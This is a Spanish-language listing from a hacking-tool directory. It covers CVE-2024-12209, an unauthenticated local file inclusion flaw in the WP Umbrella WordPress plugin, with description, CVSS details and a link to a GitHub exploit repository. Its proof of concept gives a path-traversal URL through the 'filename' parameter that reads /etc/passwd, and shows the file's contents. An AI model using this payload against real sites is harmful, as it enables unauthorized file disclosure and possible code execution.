Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-12209 — WP Umbrella: Actualización, Copia de Seguridad, Restauración y Monitoreo <= 2.17.0 - Inclusión Local de Archivos no Autenticada | Kitploit
Herramientas/GitHubGitHub/randomrobbiebf/cve-2024-12209
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubrandomrobbiebf/cve-2024-12209

CVE-2024-12209

WP Umbrella: Actualización, Copia de Seguridad, Restauración y Monitoreo <= 2.17.0 - Inclusión Local de Archivos no Autenticada

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-12209

WP Umbrella: Update Backup Restore & Monitoring <= 2.17.0 - Vulnerabilidad de inclusión de archivos locales no autenticada

Descripción

El plugin WP Umbrella: Update Backup Restore & Monitoring para WordPress es vulnerable a Inclusión de Archivos Locales en todas las versiones hasta la 2.17.0 inclusive, a través del parámetro 'filename' de la acción 'umbrella-restore'. Esto permite que atacantes no autenticados incluyan y ejecuten archivos arbitrarios en el servidor, lo que permite la ejecución de cualquier código PHP en esos archivos. Esto puede ser utilizado para eludir controles de acceso, obtener datos sensibles o lograr la ejecución de código en casos donde se puedan subir e incluir imágenes y otros tipos de archivos "seguros".

Detalles

  • Tipo: plugin
  • Slug: wp-health
  • Versión afectada: 2.17.0
  • Puntaje CVSS: 9.8
  • Clasificación CVSS: Crítico
  • Vector CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-12209
  • Estado: Activo

POC

root@kitploit:~
https://wp-dev.ddev.site/?umbrella-restore=1&filename=../../../../../../etc/passwd
root@kitploit:~
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
Descargar herramienta